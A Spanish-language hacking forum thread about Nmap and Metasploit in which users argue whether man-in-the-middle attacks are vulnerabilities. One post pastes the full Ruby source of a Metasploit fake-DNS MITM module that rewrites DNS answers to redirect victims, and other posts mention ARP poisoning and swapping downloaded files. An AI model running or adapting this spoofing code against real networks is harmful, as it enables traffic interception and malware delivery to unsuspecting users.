Autor
|
Tema: Ayuda Nmap y Metasploit (Leído 28,995 veces)
|
Shell Root
|
que opinas Shell Root??
Bueno, xD, ando de nuevo retirado, ocupaciones como "Desarrollador de Software", quitan demasiado tiempo. Así, solo diré... "Una vulnerabilidad es tan limitada como tu quieras que sea" y... [ Ettercap] And [ Metasploit], hacen una gran pareja!
|
|
|
En línea
|
Te vendería mi talento por poder dormir tranquilo.
|
|
|
rockernault
Desconectado
Mensajes: 2.046
Linux User!!!
|
me referia a que es una tonteria... MiTM no es una vulnerabilidad...
podrias modificar los paquetes.. pero con que objeto???
|
|
|
En línea
|
|
|
|
Shell Root
|
me referia a que es una tonteria... MiTM no es una vulnerabilidad... Es verdad... tan solo es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado...Tal vez si los paquetes fuesen "Archivos", se modificarian por algun PAYLOAD PD: fakedns.rb, responde a cualquier consulta DNS con una respuesta falsa apuntando a una dirección IP específica. ## # $Id: fakedns.rb 5540 2008-06-25 23:04:19Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## require 'msf/core' require 'resolv' module Msf class Auxiliary::Server::MITM_FakeDNS < Msf::Auxiliary include Auxiliary::Report def initialize super( 'Name' => 'MITM DNS Service', 'Version' => '$Revision: 5540 $', 'Description' => %q{ This hack of the metasploit fakedns.rb serves as a sort of MITM DNS server. Requests are passed through to a real DNS server, and the responses are modified before being returned to the client, if they match regular expressions set in FILENAME. }, 'Author' => ['ddz', 'hdm', 'Wesley McGrew <wesley@mcgrewsecurity.com>'], 'License' => MSF_LICENSE, 'Actions' => [ [ 'Service' ] ], 'PassiveActions' => [ 'Service' ], 'DefaultAction' => 'Service' ) register_options( [ OptAddress.new('SRVHOST', [ true, "The local host to listen on.", '0.0.0.0' ]), OptPort.new('SRVPORT', [ true, "The local port to listen on.", 53 ]), # W: Added in an option for a set of filters, took out the catchall TARGETHOST OptAddress.new('REALDNS', [true,"Ask this server for answers",nil]), OptString.new('FILENAME', [true,"File of ip,regex for filtering responses",nil]) ], self.class) end def run begin fp = File.new(datastore['FILENAME']) rescue print_status "Could not open #{datastore['FILENAME']} for reading. Quitting." return end mod_entries = [] while !fp.eof? entry = fp.gets().chomp().split(',') mod_entries.push([entry[0],Regexp.new(entry[1])]) end @port = datastore['SRVPORT'].to_i # MacOS X workaround ::Socket.do_not_reverse_lookup = true @sock = ::UDPSocket.new() @sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1) @sock.bind(datastore['SRVHOST'], @port) @run = true Thread.new { # Wrap in exception handler begin while @run packet, addr = @sock.recvfrom(65535) if (packet.length == 0) break end request = Resolv::DNS::Message.decode(packet) # W: Go ahead and send it to the real DNS server and # get the response sock2 = ::UDPSocket.new() sock2.send(packet, 0, datastore['REALDNS'], 53) #datastore['REALDNS'], 53) packet2, addr2 = sock2.recvfrom(65535) sock2.close() real_response = Resolv::DNS::Message.decode(packet2) fake_response = Resolv::DNS::Message.new() fake_response.qr = 1 # Recursion desired fake_response.ra = 1 # Recursion available fake_response.id = real_response.id real_response.each_question { |name, typeclass| fake_response.add_question(name, typeclass) } real_response.each_answer { |name, ttl, data| replaced = false mod_entries.each { |e| if name.to_s =~ e[1] case data.to_s when /IN::A/ data = Resolv::DNS::Resource::IN::A.new(e[0]) replaced = true when /IN::MX/ data = Resolv::DNS::Resource::IN::MX.new(10,Resolv::DNS::Name.create(e[0])) replaced = true when /IN::NS/ data = Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(e[0])) replaced = true when /IN::PTR/ # Do nothing replaced = true else # Do nothing replaced = true end end break if replaced } fake_response.add_answer(name,ttl,data) } real_response.each_authority { |name, ttl, data| mod_entries.each { |e| if name.to_s =~ e[1] data = Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(e[0])) break end } fake_response.add_authority(name,ttl,data) } response_packet = fake_response.encode() @sock.send(response_packet, 0, addr[3], addr[1]) end # Make sure the socket gets closed on exit rescue ::Exception => e print_error("fakedns: #{e.class} #{e} #{e.backtrace}") ensure @sock.close end } end end end
|
|
|
En línea
|
Te vendería mi talento por poder dormir tranquilo.
|
|
|
tragantras
Desconectado
Mensajes: 465
|
me referia a que es una tonteria... MiTM no es una vulnerabilidad...
podrias modificar los paquetes.. pero con que objeto???
jajaja, cierto cierto.... qué tontería esto de poder modificar los archivos que te bajes eh... mira que si alguien coge y te cambia tu crack.exe por virusaco.exe aisss que tonterías... xD Un MiTM yo lo considero que es una vulnerabilidad, es una vulnerabilidad de ciertas configuraciones de las tablas cache ARP. Hace 1 año o asi unos investigadores consiguieron hacer un MiTM a una camara de vigilancia IP, pudiendo insertar el video que quisiesen, eso tambien lo ves una tonteria? jaja si es capaz, de modificar los paquetes que un usuario se descarga tiene medio trabajo hecho...
|
|
|
En línea
|
|
|
|
rockernault
Desconectado
Mensajes: 2.046
Linux User!!!
|
que es eso de "ciertas configuraciones" ???
el protocolo es el ARP... protocolo de resolucion de direcciones que se encarga de asociar MAC/IP
no hay nada que configurar en el mismo protocolo... salvo que sean estaticas o dinamicas..
y NO es una vulnerabilidad.... digamos que es un mal uso del protocolo...
modificar paquetes??? hablamos de vulnerabilidades de un sistema... ya sea de SO o de programas (Excel, Adobe, etc)
el DNS spoofin' y esas cosas.. son malos usos de los protocolos y tu no puedes impedirlos... a excepcion de que sepas como defenderte de esos ataques en concreto... y respecto a MSF... si te sirve, bien si no... tambn...
|
|
|
En línea
|
|
|
|
tragantras
Desconectado
Mensajes: 465
|
que es eso de "ciertas configuraciones" ???
el protocolo es el ARP... protocolo de resolucion de direcciones que se encarga de asociar MAC/IP
no hay nada que configurar en el mismo protocolo... salvo que sean estaticas o dinamicas..
y NO es una vulnerabilidad.... digamos que es un mal uso del protocolo...
modificar paquetes??? hablamos de vulnerabilidades de un sistema... ya sea de SO o de programas (Excel, Adobe, etc)
el DNS spoofin' y esas cosas.. son malos usos de los protocolos y tu no puedes impedirlos... a excepcion de que sepas como defenderte de esos ataques en concreto... y respecto a MSF... si te sirve, bien si no... tambn...
con ciertas configuraciones me refería exactamente a lo que tu has mencionado, se pueden configurar las tablas de manera estática evitando el ARP poisoning o de manera dinámica siendo vulnerable ( aun que no quieras aceptar ese término ). modificar paquetes es una solucion perfectamente válida, quizá dificil de implementar, pero válida es xD
|
|
|
En línea
|
|
|
|
rockernault
Desconectado
Mensajes: 2.046
Linux User!!!
|
y venga... que modificarias en los paquetes???
nada de que es dificil.. si lo mencionaste es porque sabes hacerlo....
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Nmap, Nessus y Metasploit
Dudas Generales
|
El Gnomo
|
1
|
4,592
|
10 Enero 2011, 01:27 am
por Shell Root
|
|
|
Nmap, Nessus y Metasploit
Hacking
|
El Gnomo
|
2
|
5,495
|
13 Enero 2011, 23:26 pm
por El Gnomo
|
|
|
Ayuda urgente con los NSE de nmap-6.00
Hacking
|
D4rck4r
|
2
|
2,628
|
11 Junio 2012, 02:59 am
por D4rck4r
|
|
|
¿Alguien me puede dejar algún manual de nmap y de metasploit?
Seguridad
|
robertito_prado
|
3
|
3,231
|
23 Julio 2012, 03:33 am
por robertito_prado
|
|
|
Como agregar nmap 6.01 a el metasploit y armitage
Seguridad
|
D4rck4r
|
0
|
2,144
|
10 Agosto 2012, 20:38 pm
por D4rck4r
|
|